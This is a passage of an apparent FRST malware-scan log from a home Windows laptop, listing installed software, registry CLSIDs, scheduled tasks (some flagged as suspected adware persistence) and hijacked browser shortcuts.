Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{41BC9E31-0D39-462E-8E4C-767B21A3B1C3}) (Version: 3.1.8.0 - Apple Inc.)
Mp3tag v2.52 (HKLM-x32\...\Mp3tag) (Version: v2.52 - Florian Heidenreich)
msi Software Install (HKLM-x32\...\{A840FFFB-3A80-4C24-AB34-BE9F56BEB4CE}) (Version: 3.1000.1005.1101 - Micro-Star International Co., Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Music Manager (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\MusicManager) (Version:  - Google, Inc.)
MyHarmony (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.0 - Nikon)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Online Plug-in (x32 Version: 14.2.100.14 - Citrix Systems, Inc.) Hidden
Photo Stamp Remover 6.0 (HKLM-x32\...\Photo Stamp Remover_is1) (Version: 6.0 - SoftOrbits)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.5.0 - Nikon)
Poker Tournament Supervisor (HKLM-x32\...\{93ED8388-3C43-4D49-8081-03A0BE7D4E2F}_is1) (Version: 1.3n - Hermann Sorais)
Poker Tournament Supervisor 2 (HKLM-x32\...\{105094B6-4CE8-4AB8-BC17-DDE37F3DE050}}_is1) (Version: 2.0a - Graph & In)
PokerTracker 3 (remove only) (HKLM-x32\...\PokerTracker3) (Version:  - )
PokerTracker 4 (remove only) (HKLM-x32\...\PokerTracker4) (Version:  - )
PostgreSQL 8.3 (HKLM-x32\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PX5 Advanced Sound Editor (HKLM-x32\...\{276B495F-9DB0-4FC6-BEB0-85C91FC0F5E2}) (Version: 0.9.0.0 - Turtle Beach)
Quicken 2009 (HKLM-x32\...\{ED2A3C11-3EA8-4380-B59C-F2C1832731B0}) (Version: 18.1.1.29 - Intuit)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.8.8 - Intuit)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.2 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.2 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.72.410.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Ringtone Expressions 1.6.0 (HKLM-x32\...\Ringtone Expressions) (Version: 1.6.0 - Gx5 L.L.C.)
RogueKiller version 10 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 10 - Adlice Software)
Samsung Content Viewer (HKLM-x32\...\InstallShield_{980DDB3E-8957-4750-98EB-5D04F61CCEDC}) (Version: 1.0.2 - Samsung)
Samsung Content Viewer (x32 Version: 1.0.2 - Samsung) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.0.2.309 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Self-service Plug-in (x32 Version: 4.2.100.5943 - Citrix Systems, Inc.) Hidden
Sena Bluetooth Device Manager 1.4.2 (HKLM-x32\...\Sena Bluetooth Device Manager) (Version: 1.4.2 - Copyright © 2012 ~ 2013 Sena Technologies Inc.)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Skifta (HKLM-x32\...\Skifta) (Version: 2.6.2.0 - skifta.com)
Skype™ 6.7 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.7.102 - Skype Technologies S.A.)
SMH10 Manager 1.4 (HKLM-x32\...\SMH10 Manager) (Version: 1.4 - Copyright © 2012 SENA Technologies Inc.)
System Control Manager (HKLM-x32\...\{ED9C5D25-55DF-48D8-9328-2AC0D75DE5D8}) (Version: 2.210.0604.006.19 - Micro-Star International Co., Ltd.)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.38843 - TeamViewer)
Texas Hold'em Poker 3D - Deluxe Edition 1.0 (HKLM-x32\...\{E26DEDC7-1A99-4F8C-9615-6DB112E6495B}_is1) (Version: Texas Hold'em Poker 3D - Deluxe Edition - Play + Smile Marketing GmbH)
Text-To-Speech-Runtime (HKLM-x32\...\{7B3F0113-E63C-4D6D-AF19-111A3165CCA2}) (Version: 1.0.0.0 - Magix Development GmbH)
THX TruStudio Pro (HKLM-x32\...\{4FA6CB9A-2972-4AAF-A36E-3C40FCC22395}) (Version: 1.0 - Creative Technology Limited)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
Turtle Beach WinUSB Driver (HKLM\...\{D7593549-B589-40AB-95F0-5ED5AA14D2BC}) (Version: 1.0.1 - Turtle Beach)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Veetle TV 0.9.18 (HKLM-x32\...\Veetle TV) (Version: 0.9.18 - Veetle, Inc)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.9.0 - Nikon)
Virtual DJ - Atomix Productions (HKLM-x32\...\Virtual DJ - Atomix Productions) (Version:  - )
VLC media player 2.0.8 (HKLM-x32\...\VLC media player) (Version: 2.0.8 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 4.6 - Vuze Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7500 - Broadcom Corporation)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (02/03/2011 2.4.0.0) (HKLM\...\88C277C6E63CBDAF35A096E80A5B97A29A619D3A) (Version: 02/03/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\8751DB371004DC10847CB5D366A319631EA4E3EA) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\9B7C4D96A86401A6757BBE6A4B143083977687BE) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (08/21/2013 2.5.0.3) (HKLM\...\753B2CC50DC57D399D6A69B8563D5ABD5D9F24D3) (Version: 08/21/2013 2.5.0.3 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\02AD34F29D32C048B03F694998ED36AD51FD3A5E) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\5C4609FFB0CD6B7FB69EF6329744776215ADCA7B) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - ENE (EUCR) USB  (12/04/2009 5.89.0.64) (HKLM\...\7F973C87231D745EBF31E772CC38BB9B185D3819) (Version: 12/04/2009 5.89.0.64 - ENE)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\win64\npPlayerPlugin.dll (DIRECTV)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {060DD4D9-6920-4821-8A80-EFF6E5791AF4} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {102A620C-F30C-4549-9641-182161BCECEB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {110D4053-AA73-447C-B6B3-48CD31F6572B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {17C357AD-790B-4487-9EF3-85A67A824811} - System32\Tasks\{97B6A379-97C9-430F-B2E5-15B6C598AC3E} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.114.259/en/abandoninstall?page=tsGoogle&amp;installinfo=google-toolbar:offered-installed,google-chrome:notoffered;toolbaroffered
Task: {17CD11FE-A7DA-4D1F-A4CB-1090BBDFF29B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {1BAAE6FE-C34D-4631-9BB2-16D444231725} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {1C07BC4D-6C83-4929-8C27-27540D33FE03} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {1ED8626C-2400-4582-A967-F9A52267AE24} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {323B5AD8-0CF3-498F-B85C-6889DE79CF89} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat
Task: {3DF820E0-8F46-4EB1-B527-90FB60D07C89} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3E30049C-2379-44D4-8849-EEDC4325D38E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {431A8418-553F-414C-B938-84B7D6C11432} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {44D3ABD7-2C48-49E1-BA82-77979369651E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {45990708-B34A-436F-BE29-9EA605DD416D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {45F5242B-C2FC-4454-9CF1-BE4671B59D6C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {481D6FE8-8CD0-499D-AA02-DF3B8164C7D1} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {4F094485-564E-4476-86A4-BCFBCC9C239A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {55EE3DBF-57F8-4103-83B5-88720E7EEBD8} - System32\Tasks\{0E6FA772-6156-47E2-AE1D-5EE3A8A05AD9} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2013-07-25] (Skype Technologies S.A.)
Task: {564B49C2-B6F5-4F1E-97F5-C10111DA8EE4} - \{99331EF5-343D-47FD-B006-40F37A0D5E9D} -> No File <==== ATTENTION
Task: {5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {5AF597F4-43A4-4292-9389-1D19188D828F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {5B6A393D-57E5-4198-BD7E-00E0B9EF3F77} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5BD1D165-089F-40BA-8D52-B90C85B1BB0D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {5FDFFDC9-967D-4EDE-A7C3-BEE9A0C27400} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {65D5FB16-42C7-455F-9350-4764AE0293D0} - System32\Tasks\{E4FFFFE0-2787-4DAC-B105-2C808A1A2A4D} => pcalua.exe -a C:\Users\RoNiN\AppData\Local\Temp\jre-8u31-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1
Task: {675E23A2-F0D8-4806-9687-F581BB0AC6B7} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6A490FA7-CA93-4214-B394-9AB008143C0D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B6A2BE2-8A42-4CCE-96D1-DCDE0AA16594} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {6CFB64B8-C96E-4505-B19D-05BFFFDB4366} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {6D890055-866E-4872-979D-B8AB3884F1DC} - System32\Tasks\WMMAWVKOLXONAOYC => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {7F54B173-73A7-455D-B8D3-05CDBEB04D24} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {81C671AC-4BCA-4B4C-B16A-DA9DC94B2032} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {869A0025-9207-4E47-A0E0-83ACF33323CB} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe
Task: {874B492C-C094-4938-A93E-0F5141822989} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {8FD417A1-EAB1-4416-AFED-D43B138420F6} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {974DD040-169D-46B7-B08A-60E9035DA668} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A7A740CC-1533-48ED-98D6-67AEE41F1954} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {A81D9481-C8A7-47F7-A447-0ACE98E4FAF4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {AB264965-3447-457B-AC17-BEE07AFCF056} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-RONIN-LAPTOP => C:\Windows\ehome\McxTask.exe
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
Task: {BE0F7D0B-3323-406F-AAEF-1A12388A1C9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {C6CF2B0F-A54A-4CCD-88C0-72501BA9267D} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {C84934AC-6228-4A08-9F09-7D7A54133B68} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C94198D0-0BC7-4528-B38A-B285C7D79AC0} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {CC2E5376-92DF-4854-8C3D-F54EED7D6667} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {CEAFA10F-5C90-45F6-BCFE-420DFC90526C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {D3ACB7DB-7815-42A9-A39F-8D89E1EDF573} - System32\Tasks\Pritc => C:\Users\RoNiN\AppData\Local\Temp\is-TIN56.tmp\print.exe <==== ATTENTION
Task: {D92D97F2-2EDF-4800-82E5-E726F16D0395} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DF294663-0E97-4583-81A3-6DA69DA846AC} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {E86953B2-7A47-4920-B975-308AAEEA66E9} - System32\Tasks\BJZJKCUBLH1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: {ED1A577E-497C-4A70-998F-01B3E908FA9B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAAA50A7-6B6E-4A1A-B40E-B19F2672A919} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {FB119739-D5B0-4725-B8A1-6684820F96FB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD} - \LuckyTab -> No File <==== ATTENTION
Task: {FC5FE3D1-68A5-4CAD-84FC-0A61139E9C31} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\BJZJKCUBLH1.job => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a41ce5b91aa3166e\MightyText - SMS from PC & Text from Computer.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-07-09 23:33 - 2015-07-09 23:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
